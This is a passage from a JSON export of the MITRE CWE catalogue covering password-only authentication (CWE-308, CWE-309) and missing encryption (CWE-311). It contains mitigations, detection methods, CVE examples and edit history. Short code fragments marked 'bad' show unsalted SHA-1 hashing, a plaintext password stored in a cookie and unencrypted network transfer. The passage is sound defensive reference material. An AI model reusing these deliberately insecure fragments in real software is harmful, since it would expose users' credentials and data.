password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using single-factor authentication"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Using Single-factor Authentication","attr":{"@_Date":"2008-04-11"}}}},"309":{"attr":{"@_ID":"309","@_Name":"Use of Password System for Primary Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"654","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"308","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Password systems are the simplest and most ubiquitous authentication mechanisms. However, they are subject to such well known attacks,and such frequent compromise that their use in the most simple implementation is not practical."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"A password authentication mechanism error will almost always result in attackers being authorized as valid users."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"In order to protect password systems from compromise, the following should be noted:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Passwords should be stored safely to prevent insider attack and to ensure that -- if a system is compromised -- the passwords are not retrievable. Due to password reuse, this information may be useful in the compromise of other systems these users work with. In order to protect these passwords, they should be stored encrypted, in a non-reversible state, such that the original text password cannot be extracted from the stored value.","Password aging should be strictly enforced to ensure that passwords do not remain unchanged for long periods of time. The longer a password remains in use, the higher the probability that it has been compromised. For this reason, passwords should require refreshing periodically, and users should be informed of the risk of passwords which remain in use for too long.","Password strength should be enforced intelligently. Rather than restrict passwords to specific content, or specific length, users should be encouraged to use upper and lower case letters, numbers, and symbols in their passwords. The system should also ensure that no passwords are derived from dictionary words."]}}}},{"Phase":"Architecture and Design","Description":"Use a zero-knowledge password protocol, such as SRP."},{"Phase":"Architecture and Design","Description":"Ensure that passwords are stored safely and are not reversible."},{"Phase":"Architecture and Design","Description":"Implement password aging functionality that requires passwords be changed after a certain point."},{"Phase":"Architecture and Design","Description":"Use a mechanism for determining the strength of a password and notify the user of weak password use."},{"Phase":"Architecture and Design","Description":"Inform the user of why password protections are in place, how they work to protect data integrity, and why it is important to heed their warnings."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using password systems"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Using Password Systems","attr":{"@_Date":"2008-04-11"}}}},"311":{"attr":{"@_ID":"311","@_Name":"Missing Encryption of Sensitive Data","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not encrypt sensitive or critical information before storage or transmission.","Extended_Description":"The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhere near where the user is connected to the network (such as a colleague on the company network) but can be anywhere along the path from the user to the end server."},{"Scope":["Confidentiality","Integrity"],"Impact":"Modify Application Data","Note":"Omitting the use of encryption in any program which transfers data over a network of any kind should be considered on par with delivering the data sent to each user on the local networks of both the sender and receiver. Worse, this omission allows for the injection of data into a stream of communication between two parties -- with no means for the victims to separate valid data from invalid. In this day of widespread network attacks and password collection sniffers, it is an unnecessary risk to omit encryption from the design of any system which might benefit from it."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"The characterizaton of sensitive data often requires domain-specific understanding, so manual methods are useful. However, manual efforts might not achieve desired code coverage within limited time constraints. Black box methods may produce artifacts (e.g. stored data or unencrypted network transfer) that require manual evaluation.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Automated measurement of the entropy of an input/output source may indicate the use or lack of encryption, but human analysis is still required to distinguish intentionally-unencrypted data (e.g. metadata) from sensitive data."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Network Sniffer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Man-in-the-middle attack tool"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify which data or resources are valuable enough that they should be protected by encryption. Require that any transmission or storage of this data/resource should use well-vetted encryption algorithms."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Ensure that encryption is properly integrated into the system design, including but not necessarily limited to:","Identify the separate needs and contexts for encryption:","Using threat modeling or other techniques, assume that data can be compromised through a separate vulnerability or weakness, and determine where encryption will be most effective. Ensure that data that should be private is not being inadvertently exposed using weaknesses such as insecure permissions (CWE-732). [REF-7]"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Encryption that is needed to store or transmit private data of the users of the system","Encryption that is needed to protect the system itself from unauthorized disclosure or tampering"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["One-way (i.e., only the user or recipient needs to have the key). This can be achieved using public key cryptography, or other techniques in which the encrypting party (i.e., the software) does not need to have access to a private key.","Two-way (i.e., the encryption can be automatically performed on behalf of a user, but the key must be available so that the plaintext can be automatically recoverable by that user). This requires storage of the private key in a format that is recoverable only by the user (or perhaps by the operating system) in a way that cannot be recovered by others."]}}]}},{"attr":{"@_Mitigation_ID":"MIT-24"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.","For example, US government systems require FIPS 140-2 certification.","Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.","Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]"]}},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-40"},"Intro_Text":"This code writes a user\'s login information to a cookie so the user does not have to login again later.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function persistLogin($username, $password){}","xhtml:div":{"#text":"$data = array(\\"username\\" =&gt; $username, \\"password\\"=&gt; $password);setcookie (\\"userdata\\", $data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["The code stores the user\'s username and password in plaintext in a cookie on the user\'s machine. This exposes the user\'s login information if their computer is compromised by an attacker. Even if the user\'s machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie.","Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-41"},"Intro_Text":"The following code attempts to establish a connection, read in a password, then store it to a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error(\\"Unknown host\\");memcpy( (char *)&amp;server.sin_addr,(char *)hp-&gt;h_addr,hp-&gt;h_length);if (argc &lt; 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&amp;server, sizeof server) &lt; 0) error(\\"Connecting\\");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) {","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"write(dfd,password_buffer,n);...","xhtml:br":["","",""]}}}},"Body_Text":"While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors."},{"attr":{"@_Demonstrative_Example_ID":"DX-42"},"Intro_Text":"The following code attempts to establish a connection to a site to communicate sensitive information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":[{"#text":"URL u = new URL(\\"http://www.secret.example.org/\\");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod(\\"PUT\\");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//..."}}],"xhtml:br":""}},"Body_Text":"Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2272","Description":"password and username stored in cleartext in a cookie","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272"},{"Reference":"CVE-2009-1466","Description":"password stored in cleartext in a file with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466"},{"Reference":"CVE-2009-0152","Description":"chat program disables SSL in some circumstances even when the user says to use SSL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152"},{"Reference":"CVE-2009-1603","Description":"Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603"},{"Reference":"CVE-2009-0964","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964"},{"Reference":"CVE-2008-6157","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157"},{"Reference":"CVE-2008-6828","Description":"product stores a password in cleartext in memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828"},{"Reference":"CVE-2008-1567","Description":"storage of a secret key in cleartext in a temporary file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567"},{"Reference":"CVE-2008-0174","Description":"SCADA product uses HTTP Basic Authentication, which is not encrypted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174"},{"Reference":"CVE-2007-5778","Description":"login credentials stored unencrypted in a registry key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778"},{"Reference":"CVE-2002-1949","Description":"Passwords transmitted in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949"},{"Reference":"CVE-2008-4122","Description":"Chain: Use of HTTPS cookie without \\"secure\\" flag causes it to be transmitted across unencrypted HTTP.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122"},{"Reference":"CVE-2008-3289","Description":"Product sends password hash in cleartext in violation of intended policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289"},{"Reference":"CVE-2008-4390","Description":"Remote management feature sends sensitive information including passwords in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390"},{"Reference":"CVE-2007-5626","Description":"Backup routine sends password in cleartext in email.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626"},{"Reference":"CVE-2004-1852","Description":"Product transmits Blowfish encryption key in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852"},{"Reference":"CVE-2008-0374","Description":"Printer sends configuration information, including administrative password, in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"},{"Reference":"CVE-2007-4786","Description":"Product sends passwords in cleartext to a log server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786"},{"Reference":"CVE-2005-3140","Description":"Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to encrypt data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":4,"Entry_Name":"Insufficient Transport Layer Protection"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC00-J","Entry_Name":"Use SSLSocket rather than Socket for secure data exchange"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"157"}},{"attr":{"@_CAPEC_ID":"158"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"609"}},{"attr":{"@_CAPEC_ID":"65"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Protecting Secret Data&#34; Page 299"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 17: Failure to Protect Stored Data.&#34; Page 253"}},{"attr":{"@_External_Reference_ID":"REF-265"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Encryption&#34;, Page 43"}},{"attr":{"@_External_Reference_ID":"REF-267"}}]},"Notes":{"Note":{"#text":"There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, 